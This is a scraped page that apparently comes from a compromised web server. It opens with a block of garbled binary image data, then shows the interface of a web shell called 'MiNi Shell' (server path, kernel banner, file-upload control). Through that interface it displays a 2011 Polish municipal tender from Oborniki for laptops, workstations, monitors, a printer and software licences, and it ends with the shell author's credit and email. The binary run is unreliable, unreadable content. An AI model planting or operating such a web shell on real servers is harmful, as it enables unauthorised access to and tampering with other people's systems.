JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110221/59159-N-2011.html

<p class="kh_header"><b>Oborniki: Dostawa i instalacja fabrycznie nowego sprzętu komputerowego oraz oprogramowania - I etap</b><br>
<b>Numer ogłoszenia: 59159 - 2011; data zamieszczenia: 21.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oborniki, Urząd Miejski w Obornikach , ul. Piłsudskiego 76, 64-600 Oborniki, woj. wielkopolskie, tel. 061 6559100; 6559133, faks 061 6559101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oborniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i instalacja fabrycznie nowego sprzętu komputerowego oraz oprogramowania - I etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Nazwa przedmiotu zamówienia: dostawa i instalacja fabrycznie nowego sprzętu komputerowego oraz oprogramowania - I etap.
2.Wykaz i konfiguracja przedmiotu zamówienia oraz minimalne wymagania techniczne:
a)sprzęt:
notebook - 5 sztuk,
stacja robocza - 4 sztuki,
monitor LCD 19 - 4 sztuki,
drukarka A4, laserowa, monochromatyczna - 1 sztuka.

Notebook 
L.p.	Właściwości	Parametry wymagane
1	Procesor	Architektura procesora: 64 bit
Liczba rdzeni: 4
Liczba wątków: 8
Częstotliwość pracy zegara: min. 1,73 GHz
Cache: 6 MB
Rozszerzenia instrukcji: SSE4.2
Technologia wykonania: 45 nm
Maksymalna wielkość TDP (Thermal Design Power): 45 W
2	Chipset	Zaprojektowany i wykonany przez producenta procesora
3	Pamięć RAM	6 GB (SODIMM DDRAM3, 1333 MHz)
4	Gniazda pamięci	4 szt.
5	Dysk twardy	500 GB, 7200 obr.
6	Napęd optyczny	Blue-Ray Combo
7	Typ ekranu	LED, błyszczący
8	Przekątna ekranu	15,6 cala
9	Nominalna rozdzielczość	1920x1080
10	Karta graficzna	Zewnętrzna, własna pamięć: 1024 MB DDR3
11	Karta dźwiękowa	Zintegrowana
12	Karta sieciowa	LAN Ethernet 10/100/1000 Mbps
Wi-Fi 802.11 b/g/n
13	Typ baterii	Litowo-jonowa
6-komorowa
4400 mAh
14	Urządzenie wskazujące	Touchpad
15	Interfejsy wejścia/wyjścia	1x Bluetooth 2.0
1x czytnik kart 5w1 (MMC/SD/MS/MS Pro/MS-Duo)
1x HDMI
1x USB/eSATA combo
1x VGA (D-Sub 15 pin)
2x USB 2.0
1x USB 3.0
1x RJ-45
1x wejście mikrofonowe
1x wyjście słuchawkowe
16	Kamera internetowa	2 MPix wbudowana
17	Mikrofon	Tak, wbudowany
18	Głośniki	Tak
19	Zasilacz	Tak, w zestawie
20	System operacyjny	System operacyjny 64 bit, w wersji minimum Professional. 
Wymagane najnowsze rozwiązania.
Wymagana polska wersja językowa systemu.
Wymagany nośnik z wersją instalacyjną lub nośnik recovery.
21	Wymiary	Długość max. 391 mm, szerokość max. 266 mm
22	Waga	Max. 2,9 kg
23	Gwarancja	24 miesiące

Stacja robocza
Właściwość	Parametry wymagane
Procesor	Procesor klasy x86 posiadający co najmniej dwa rdzenie, taktowanie szyny systemowej nie mniej niż 1066 MHz, pojemność pamięci cache co najmniej 3MB oraz częstotliwości pracy zegara 2,93 GHz lub procesor o równoważnej wydajności według wyników testów przeprowadzonych przez Wykonawcę. W przypadku użycia przez Wykonawcę testów wydajności Zamawiający zastrzega sobie, iż w celu sprawdzenia poprawności przeprowadzonych testów Wykonawca musi dostarczyć Zamawiającemu oprogramowanie testujące, oba równoważne porównywane zestawy oraz dokładne opisy użytych testów wraz z wynikami w terminie nie dłuższym niż 3 dni od otrzymania zawiadomienia od Zamawiającego
Płyta główna	Na chipsecie rekomendowanym przez producenta procesora, zaprojektowana i wykonana przez producenta komputera.
Bios	- Możliwość wyłączenia w BIOS-ie portów USB
- Możliwość wyłączenia w BIOS-ie portu szeregowego
- Możliwość wyłączenia w BIOS-ie portu równoległego
- Możliwość wyłączenia w BIOS-ie karty sieciowej
Gniazda pamięci RAM	Minimum dwa gniazda
Pamięć	2x 2048 MB DDR3, w dwóch kościach
Zainstalowane sterowniki dysków	3x SATA
Dysk twardy	O pojemności minimum 500GB SerialATA II 7200rpm kompatybilny z technologią SMART III 
Sloty	Minimum 1x PCI-Express x16 (dopuszcza się sytuację gdy złącze jest od razu wykorzystane), minimum 2x PCI-E 1x, minimum 1x PCI
Karta graficzna	Dyskretna lub zintegrowana z płytą główną z minimum 128 MB Video RAM, dopuszcza się układ korzystający z pamięci RAM.
Karta dźwiękowa	Zintegrowana z płytą główną, zgodna z High Definition (HD) Audio
Karta sieciowa	Zintegrowana 10/100/1000, obsługująca WakeOnLan. 
Wewnętrzny napęd 
DVD-RW	- odczyt i zapis: CD-R, CD-RW, DVD?R, DVD?RW, DVD+R Dual Layer wraz z oprogramowaniem do nagrywania płyt DVD
Porty	Minimum:
1x Serial, 
6 x USB 2.0 (w tym 2 z przodu obudowy), 
1 x D-Sub 15-stykowe, 
1 x RJ45, 
1 x wejścia audio
1 x wyjścia audio,
1 x mikrofon
1 x DVI (dopuszczalne w postaci adaptera do zintegrowanej karty graficznej)

Obudowa	Typu SFF(Small Form Factor). Wymiary max: 333mm x 368mm x 97mm. (szerokość x głębokość x wysokość), waga netto max. do 8,5kg.
Zasilacz minimum 180W umożliwiający bezproblemową pracę komputera przy pełnym wyposażeniu w dodatkowe urządzenia podpięte poprzez porty i sloty rozszerzeń, przy pełnym obciążeniu.  Slot bezpieczeństwa umożliwiający montaż typu Kensington Microsaver Cable. Montaż i demontaż obudowy musi odbywać się beznarzędziowo.
Klawiatura, mysz	Klawiatura typu Windows pełnowymiarowa, układ typu QWERTY US, port USB. Mysz optyczna ze scrollem, minimum 400dpi, minimum dwa przyciski, port USB; Tego samego producenta, co jednostka centralna. 
System operacyjny	System operacyjny w wersji minimum Professional.
Wymagana polska wersja systemu, nośnik recovery CD lub DVD umożliwiający szybką instalację systemu operacyjnego wraz z dedykowanym oprogramowaniem
Zamawiający wykorzystuje w swojej siedzibie Microsoft Windows XP Professional PL OEM,
Funkcje bezpieczeństwa - obudowa musi posiadać możliwość współpracy z zabezpieczeniem antykradzieżowym typu Kensington Microsaver Cable
- BIOS musi posiadać możliwość skonfigurowania hasła Power On, hasła dostępu do BIOSu, blokadę portów USB, COM
- BIOS musi umożliwiać blokadę dostępu do napędu optycznego.
Dodatkowe oprogramowanie	- Oprogramowanie producenta komputera umożliwiające aktualizację sterowników oraz podsystemu poprzez Internet;
- Oprogramowanie producenta komputera, umożliwiające aktualizację oprogramowania antywirusowego oraz skanowanie dysku z poziomu podsystemu bezpieczeństwa (nie systemu operacyjnego). Konieczna jest również możliwość dostępu do Internetu z poziomu w/w podsystemu.
- Oprogramowanie do nagrywania i odtwarzania DVD/CD
Atesty i certyfikaty 	- Certyfikat ISO 9001 dla producenta sprzętu na proces projektowania i  produkcji      
   lub   równoważny 
- Certyfikat  CE 
Gwarancja	36 miesięcy gwarancji na zestaw, on-site
Dokumentacja	Do komputera muszą być dołączone instrukcje obsługi i opis zainstalowanego systemu w języku polskim

Monitor LCD 19

L.p.	Parametr	Wartość parametru
1.	Przekątna ekranu (nie mniejsza niż)	Min. 19 cali WIDE
2.	Technologia podświetlenia matrycy	LED
3.	Typ matrycy	Matowa (nie GLOSSY)
4.	Rozdzielczość nominalna (nie mniejsza niż)	Min. 1440 x 900 pikseli
5.	Kontrast minimalny	1000:1 MEGA DCR
6.	Jasność minimalna	250 cd/m2
7.	Czas reakcji matrycy (nie więcej niż)	5 ms
8.	Kąt widzenia pion (min)	160 stopni
9.	Kąt widzenia poziom (min)	170 stopni
10.	Ilość wyświetlanych kolorów	16,7 mln
11.	Typ złącza video	15-stykowe D-Sub, cyfrowe złącze DVI
12.	Kolor	Zgodny z kolorem obudowy komputera
13.	Gwarancja	Min. 24 miesiące

UWAGA! W momencie odbioru technicznego sprzętu ekrany LCD muszą być wolne od uszkodzonych pikseli.

Drukarka A4, laserowa, monochromatyczna
L.p.	Parametr	Wartość parametru
1.	Maksymalny rozmiar nośnika	A4
2.	Nominalna prędkość druku	35 str./min.
3.	Rozdzielczość w pionie	1200 dpi
4.	Rozdzielczość w poziomie	1200 dpi
5.	Normatywny cykl pracy	50000 str./mies.
6.	Złącza zewnętrzne	USB 2.0 (Hi-Speed);
1 slot na wewnętrzny printserwer lub twardy dysk;
Slot na opcjonalną kartę CompactFlash
7.	Gramatura papieru	60 - 220g/m2
8.	Czas osiągnięcia trybu gotowości 	Max. 19 sekund
9.		Zainstalowana pamięć	32 MB
10.		Maksymalna pojemność pamięci	544 MB
11.		Prędkość procesora	400 MHz
12.		Pojemność podajnika papieru	min. 300 szt.
13.		Maksymalna pojemność podajników	min. 800 szt.
14.		Druk dwustronny [dupleks]	Tak
15.		Język kontrolera	PRESCRIBE IIe 
16.		Emulacje	PCL 6, PCL5e, Postscript 3 ( KPDL3), Lineprinter, IBM Proprinter X24, EPSON LQ 850, DIABLO630
17.		Wymiary	Szerokość max. 375mm, głębokość max. 393mm, wysokość max.250mm
18.		Okres gwarancji	2 lata w serwise zewnętrznym

b)	oprogramowanie:
Adobe Photoshop CS5 PL WIN GOV - 1 licencja,
Corel DRAW Graphics Suite X5 Small Business Edition PL - 1 sztuka,
Pakiet biurowy Microsoft Office - 4 licencje.

L.p.	Nazwa programu	Opis
1	Adobe Photoshop CS5 PL WIN GOV 	Profesjonalne oprogramowanie do projektowania i obróbki grafiki.
Wymagana dożywotnia licencja rządowa (dla instytucji) 
Wymagana polska wersja językowa
Zawiera:
Zaawansowane narzędzia z zakresu szybkiej korekcji obrazów: Automatyczna korekcja obiektywu; filtr korekcja obiektywu; Narzędzie Wyprostuj obraz; Predefiniowane ustawienie narzędzia do tworzenia gradientu dla gęstości neutralnej
Profesjonalne narzędzia do sterowania kolorami i tonami: Program HDR Pro; Tonowanie HDR; Konwertowanie na obrazy czarno-białe; Zaawansowane funkcje korekcji kolorów
Zaawansowane narzędzia do usuwania szumów, dodawania ziarnistości
Profesjonalne narzędzia do edytowania i poprawiania obrazu: Oczyszczanie kolorów; Narzędzia dopasowywania zaznaczeń i masek; Wypełnianie z uwzględnieniem zawartości; Skalowanie z uwzględnieniem zawartości; Profesjonalne retuszowanie
Profesjonalne narzędzia do malowania i rysowania: Narzędzie pędzel mieszający; Narzędzie malarskie z przyspieszeniem GPU
Zaawansowane narzędzia do tworzenia kompozycji: Wklejanie w miejscu; Wielowarstwowe krycie; Wielowarstwowe wypełnianie; Trwałe style warstw; Narzędzie do tworzenia panoram; Narzędzie automatycznego wyrównywania warstw
Narzędzie konwersji z formatu 16-bitowego na format JPEG
2Corel DRAW Graphics Suite X5 Small Business Edition PL	Profesjonalne oprogramowanie do projektowania i obróbki grafiki. 
Dożywotnia licencja komercyjna.
Umożliwia jednoczesną instalację na 3 stacjach roboczych.
Wymagana polska wersja językowa.
Zawiera: 
CorelDRAW X5 - profesjonalne oprogramowanie do tworzenia grafiki wektorowej i składu stron
CorelPHOTO-PAINT X5 - profesjonalne oprogramowanie do edycji zdjęć
CorelPowerTRACE X5 - profesjonalne narzędzie do przekształcania map bitowych w rysunki wektorowe
Corel CAPTURE X5 - profesjonalne narzędzie do przechwytywania zawartości ekranu komputera
Corel CONNECT - profesjonalna pełnoekranowa przeglądarka umożliwiająca przeszukiwanie materiałów cyfrowych dostępnych w pakiecie, na komputerze lub w sieci lokalnej
3Pakiet biurowy Microsoft Office 	
Wymagane jest, aby zawierał: edytor tekstu, arkusz kalkulacyjny, program pocztowy, program do tworzenia i uruchamiania prezentacji
Wymagana polska wersja pakietu biurowego
Wymagane najnowsze rozwiązania
Dopuszcza się możliwość trwałego połączenia klucza seryjnego z danym zestawem komputerowym
Wymagany min. 1 nośnik z wersją instalacyjną (dopuszcza się możliwość wytworzenia nośnika przez Oferenta).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia warunek dotyczący wiedzy i doświadczenia tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie dostawy, tj. polegające na dostawie sprzętu komputerowego o wartości każdej z dostaw min. 30.000,00 zł netto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
Wykonawca ponadto przedkłada:
1)Formularz ofertowy (sporządzony według wzoru stanowiącego załącznik nr 1 IDW).
2)Kosztorys ofertowy (sporządzony według wzoru stanowiącego załącznik nr 2 IDW).
3)Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego.
2.Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
3.Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy Prawo zamówień publicznych, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia.
4.Wszelkie zmiany postanowień niniejszej umowy mogą nastąpić pisemnie, za zgodą obu stron, z zastrzeżeniem ust. 5.
5.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)termin realizacji: w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonania usług oraz w przypadku zaistnienia niekorzystnych warunków klimatycznych, 
2)wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
3)przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa lub wynika z okoliczności, których strony umowy nie mogły przewidzieć w momencie składania ofert (np. brak dostępności wymienionego w ofercie sprzętu). 
6.Nie stanowi zmiany umowy:
1)zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
2)zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.  
7.Dokonanie zmian, o których mowa  w ust. 5 wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oborniki.pl (bip.oborniki.pl)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Obornikach ul. Marsz. J. Piłsudskiego 76, 64-600 Oborniki,  Wydział Zamówień Publicznych i Pozyskiwania Funduszy pokój nr 219, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2011 godzina 13:00, miejsce: siedziba Zamawiającego - sekretariat I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com